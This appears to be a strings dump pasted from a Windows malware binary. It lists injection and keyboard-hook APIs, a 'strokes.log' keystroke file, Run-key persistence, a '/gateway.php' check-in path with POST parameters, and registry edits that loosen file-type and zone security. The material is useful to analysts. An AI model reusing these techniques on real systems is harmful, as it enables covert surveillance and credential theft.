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Nov 15th, 2019
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text 12.36 KB | None | 0 0
  1. !This program cannot be run in DOS mode.
  2. &^A`K^o
  3. &^A`Z^g
  4. &^A`^^g
  5. &^Richf
  6. .text
  7. .data
  8. .rsrc
  9. @.reloc
  10. h,y@
  11. hDy@
  12. hTy@
  13. hhy@
  14. h|y@
  15. h`}@
  16. hd|@
  17. hd|@
  18. Qhd|@
  19. hd|@
  20. hd|@
  21. #u:hd|@
  22. hd|@
  23. ljDj
  24. h 6@
  25. hP*@
  26. GetTickCount
  27. lstrcpyA
  28. CloseHandle
  29. GetCurrentProcess
  30. GetProcAddress
  31. LoadLibraryA
  32. ReadFile
  33. VirtualAlloc
  34. GetFileSize
  35. GetLastError
  36. CreateFileA
  37. SetLastError
  38. VirtualFree
  39. lstrlenA
  40. WideCharToMultiByte
  41. MultiByteToWideChar
  42. WriteFile
  43. SetFilePointer
  44. TerminateProcess
  45. OpenProcess
  46. GetVersionExA
  47. GetSystemInfo
  48. GetModuleHandleA
  49. Process32Next
  50. lstrcatA
  51. HeapFree
  52. HeapAlloc
  53. Process32First
  54. CreateToolhelp32Snapshot
  55. LeaveCriticalSection
  56. EnterCriticalSection
  57. DeleteFileA
  58. GetComputerNameA
  59. SetEvent
  60. Sleep
  61. WaitForSingleObject
  62. lstrlenW
  63. DeleteFileW
  64. CopyFileW
  65. CreateDirectoryW
  66. CreateEventA
  67. VirtualFreeEx
  68. WriteProcessMemory
  69. VirtualAllocEx
  70. IsBadReadPtr
  71. ExitProcess
  72. CreateRemoteThread
  73. DuplicateHandle
  74. CreateProcessW
  75. GetProcessVersion
  76. CreateThread
  77. MapViewOfFile
  78. CreateFileMappingA
  79. InitializeCriticalSection
  80. VirtualQuery
  81. lstrcpyW
  82. GetModuleFileNameW
  83. lstrcatW
  84. GetProcessHeap
  85. GetCurrentProcessId
  86. CreateMutexA
  87. GetCommandLineA
  88. ReadProcessMemory
  89. VirtualQueryEx
  90. lstrcmpA
  91. lstrcmpiA
  92. LockResource
  93. LoadResource
  94. SizeofResource
  95. FindResourceA
  96. GetCurrentDirectoryA
  97. TerminateThread
  98. CreateFileW
  99. ResumeThread
  100. SuspendThread
  101. KERNEL32.dll
  102. DispatchMessageA
  103. TranslateMessage
  104. GetMessageA
  105. CreateWindowExA
  106. RegisterClassExA
  107. GetSystemMetrics
  108. wsprintfA
  109. wsprintfW
  110. DefWindowProcA
  111. SetWindowsHookExA
  112. USER32.dll
  113. AdjustTokenPrivileges
  114. LookupPrivilegeValueA
  115. OpenProcessToken
  116. RegCloseKey
  117. RegSetValueExA
  118. RegOpenKeyExA
  119. RegQueryValueExA
  120. RegDeleteValueA
  121. GetUserNameA
  122. RegCreateKeyExA
  123. RegSetValueExW
  124. RegNotifyChangeKeyValue
  125. RegDeleteKeyA
  126. ADVAPI32.dll
  127. SHGetFolderPathW
  128. SHELL32.dll
  129. CoCreateGuid
  130. ole32.dll
  131. StrStrA
  132. StrCmpNIA
  133. SHLWAPI.dll
  134. HttpSendRequestA
  135. InternetCloseHandle
  136. HttpOpenRequestA
  137. InternetConnectA
  138. InternetOpenA
  139. InternetGetCookieA
  140. InternetReadFile
  141. InternetOpenUrlA
  142. WININET.dll
  143. ObtainUserAgentString
  144. urlmon.dll
  145. WS2_32.dll
  146. UuidToStringA
  147. RPCRT4.dll
  148. ?456789:;<=
  149. !"#$%&'()*+,-./0123
  150. Software\HelperSolutions Software
  151. Software\Microsoft\Windows\CurrentVersion\Run
  152. .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  153. wmiprvse.exe
  154. LogonUI.exe
  155. svchost.exe
  156. iexplore.exe
  157. explorer.exe
  158. System
  159. smss.exe
  160. csrss.exe
  161. winlogon.exe
  162. lsass.exe
  163. spoolsv.exe
  164. alg.exe
  165. wuauclt.exe
  166. firefox.exe
  167. chrome.exe
  168. devenv.exe
  169. UpdateMutex:
  170. response=
  171. page=
  172. &ump=
  173. &ks=
  174. &opt=
  175. &unm=
  176. &cnm=
  177. &view=
  178. &spec=
  179. &query=
  180. &val=
  181. &var=
  182. DetectShutdownClass
  183. download-
  184. update-
  185. checkin:
  186. scanin:
  187. uninstall
  189. /w19218317418621031041543/gateway.php
  190. ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
  191. ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
  192. ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
  193. ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
  194. SeDebugPrivilege
  195. NtQueryInformationProcess
  196. NTDLL.DLL
  197. ?456789:;<=
  198. !"#$%&'()*+,-./0123
  199. Software\HelperSolutions Software
  200. Software\Microsoft\Windows\CurrentVersion\Run
  201. .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  202. wmiprvse.exe
  203. LogonUI.exe
  204. svchost.exe
  205. iexplore.exe
  206. explorer.exe
  207. System
  208. smss.exe
  209. csrss.exe
  210. winlogon.exe
  211. lsass.exe
  212. spoolsv.exe
  213. alg.exe
  214. wuauclt.exe
  215. firefox.exe
  216. chrome.exe
  217. devenv.exe
  218. UpdateMutex:
  219. response=
  220. page=
  221. &ump=
  222. &ks=
  223. &opt=
  224. &unm=
  225. &cnm=
  226. &view=
  227. &spec=
  228. &query=
  229. &val=
  230. &var=
  231. DetectShutdownClass
  232. download-
  233. update-
  234. checkin:
  235. scanin:
  236. uninstall
  238. /w19218317418621031041543/gateway.php
  239. GetNativeSystemInfo
  240. kernel32.dll
  241. Windows 2000
  242. Windows XP
  243. Windows XP Professional x64
  244. Windows Server 2003
  245. Windows Home Server
  246. Windows Server 2003 R2
  247. Windows Vista
  248. Windows Server 2008
  249. Windows Server R2
  250. Windows 7
  251. 64 Bit
  252. 32 Bit
  253. StarDust
  254. localhost
  255. ?456789:;<=
  256. !"#$%&'()*+,-./0123
  257. Software\HelperSolutions Software
  258. Software\Microsoft\Windows\CurrentVersion\Run
  259. .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  260. wmiprvse.exe
  261. LogonUI.exe
  262. svchost.exe
  263. iexplore.exe
  264. explorer.exe
  265. System
  266. smss.exe
  267. csrss.exe
  268. winlogon.exe
  269. lsass.exe
  270. spoolsv.exe
  271. alg.exe
  272. wuauclt.exe
  273. firefox.exe
  274. chrome.exe
  275. devenv.exe
  276. UpdateMutex:
  277. response=
  278. page=
  279. &ump=
  280. &ks=
  281. &opt=
  282. &unm=
  283. &cnm=
  284. &view=
  285. &spec=
  286. &query=
  287. &val=
  288. &var=
  289. DetectShutdownClass
  290. download-
  291. update-
  292. checkin:
  293. scanin:
  294. uninstall
  296. /w19218317418621031041543/gateway.php
  297. Mozilla/4.0(compatible; MSIE 7.0b; Windows NT 6.0)
  298. POST
  299. Content-Type:application/x-www-form-urlencoded
  300. http://%s%s
  301. ?456789:;<=
  302. !"#$%&'()*+,-./0123
  303. Software\HelperSolutions Software
  304. Software\Microsoft\Windows\CurrentVersion\Run
  305. .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  306. wmiprvse.exe
  307. LogonUI.exe
  308. svchost.exe
  309. iexplore.exe
  310. explorer.exe
  311. System
  312. smss.exe
  313. csrss.exe
  314. winlogon.exe
  315. lsass.exe
  316. spoolsv.exe
  317. alg.exe
  318. wuauclt.exe
  319. firefox.exe
  320. chrome.exe
  321. devenv.exe
  322. UpdateMutex:
  323. response=
  324. page=
  325. &ump=
  326. &ks=
  327. &opt=
  328. &unm=
  329. &cnm=
  330. &view=
  331. &spec=
  332. &query=
  333. &val=
  334. &var=
  335. DetectShutdownClass
  336. download-
  337. update-
  338. checkin:
  339. scanin:
  340. uninstall
  342. /w19218317418621031041543/gateway.php
  343. Digit
  344. .exe;.bat;.reg;.vbs;
  345. Software\Microsoft\Windows\CurrentVersion\Policies\Associations
  346. LowRiskFileTypes
  347. Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
  348. 1806
  349. Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
  350. 1806
  351. ?456789:;<=
  352. !"#$%&'()*+,-./0123
  353. Software\HelperSolutions Software
  354. Software\Microsoft\Windows\CurrentVersion\Run
  355. .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  356. wmiprvse.exe
  357. LogonUI.exe
  358. svchost.exe
  359. iexplore.exe
  360. explorer.exe
  361. System
  362. smss.exe
  363. csrss.exe
  364. winlogon.exe
  365. lsass.exe
  366. spoolsv.exe
  367. alg.exe
  368. wuauclt.exe
  369. firefox.exe
  370. chrome.exe
  371. devenv.exe
  372. UpdateMutex:
  373. response=
  374. page=
  375. &ump=
  376. &ks=
  377. &opt=
  378. &unm=
  379. &cnm=
  380. &view=
  381. &spec=
  382. &query=
  383. &val=
  384. &var=
  385. DetectShutdownClass
  386. download-
  387. update-
  388. checkin:
  389. scanin:
  390. uninstall
  391. ?456789:;<=
  392. !"#$%&'()*+,-./0123
  393. Software\HelperSolutions Software
  394. Software\Microsoft\Windows\CurrentVersion\Run
  395. .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  396. wmiprvse.exe
  397. LogonUI.exe
  398. svchost.exe
  399. iexplore.exe
  400. explorer.exe
  401. System
  402. smss.exe
  403. csrss.exe
  404. winlogon.exe
  405. lsass.exe
  406. spoolsv.exe
  407. alg.exe
  408. wuauclt.exe
  409. firefox.exe
  410. chrome.exe
  411. devenv.exe
  412. UpdateMutex:
  413. response=
  414. page=
  415. &ump=
  416. &ks=
  417. &opt=
  418. &unm=
  419. &cnm=
  420. &view=
  421. &spec=
  422. &query=
  423. &val=
  424. &var=
  425. DetectShutdownClass
  426. download-
  427. update-
  428. checkin:
  429. scanin:
  430. uninstall
  432. /w19218317418621031041543/gateway.php
  433. ?456789:;<=
  434. !"#$%&'()*+,-./0123
  435. Software\HelperSolutions Software
  436. Software\Microsoft\Windows\CurrentVersion\Run
  437. .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  438. wmiprvse.exe
  439. LogonUI.exe
  440. svchost.exe
  441. iexplore.exe
  442. explorer.exe
  443. System
  444. smss.exe
  445. csrss.exe
  446. winlogon.exe
  447. lsass.exe
  448. spoolsv.exe
  449. alg.exe
  450. wuauclt.exe
  451. firefox.exe
  452. chrome.exe
  453. devenv.exe
  454. UpdateMutex:
  455. response=
  456. page=
  457. &ump=
  458. &ks=
  459. &opt=
  460. &unm=
  461. &cnm=
  462. &view=
  463. &spec=
  464. &query=
  465. &val=
  466. &var=
  467. DetectShutdownClass
  468. download-
  469. update-
  470. checkin:
  471. scanin:
  472. uninstall
  474. /w19218317418621031041543/gateway.php
  475. %s%d
  476. WindowsServiceStabilityMutex
  477. ntdll.dll
  478. NtQuerySystemTime
  479. RtlTimeToSecondsSince1970
  480. RtlGetCompressionWorkSpaceSize
  481. RtlCompressBuffer
  482. RtlDecompressBuffer
  483. IsWow64Process
  484. kernel32.dll
  485. user32.dll
  486. advapi32.dll
  487. shell32.dll
  488. urlmon.dll
  489. wininet.dll
  490. gdi32.dll
  491. rpcrt4.dll
  492. ws2_32.dll
  493. GetLastInputInfo
  494. user32.dll
  495. NoProcess
  496. debug.log
  497. |%s:
  498. SecureDll.dll
  499. SecureDll.dll
  500. strokes.log
  501. %s\%s
  502. tmp.log
  503. %s\%s
  504. val1
  505. val2
  506. debug.log
  507. #AVER_START#
  508. #AVER_START#
  509. debug.log
  510. #AVER_END#
  511. #AVER_END#
  512. debug.log
  513. ?456789:;<=
  514. !"#$%&'()*+,-./0123
  515. Software\HelperSolutions Software
  516. Software\Microsoft\Windows\CurrentVersion\Run
  517. .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  518. wmiprvse.exe
  519. LogonUI.exe
  520. svchost.exe
  521. iexplore.exe
  522. explorer.exe
  523. System
  524. smss.exe
  525. csrss.exe
  526. winlogon.exe
  527. lsass.exe
  528. spoolsv.exe
  529. alg.exe
  530. wuauclt.exe
  531. firefox.exe
  532. chrome.exe
  533. devenv.exe
  534. UpdateMutex:
  535. response=
  536. page=
  537. &ump=
  538. &ks=
  539. &opt=
  540. &unm=
  541. &cnm=
  542. &view=
  543. &spec=
  544. &query=
  545. &val=
  546. &var=
  547. DetectShutdownClass
  548. download-
  549. update-
  550. checkin:
  551. scanin:
  552. uninstall
  553. %s%s
  554. %s%s%d
  555. !This
  556. program
  557. cannot
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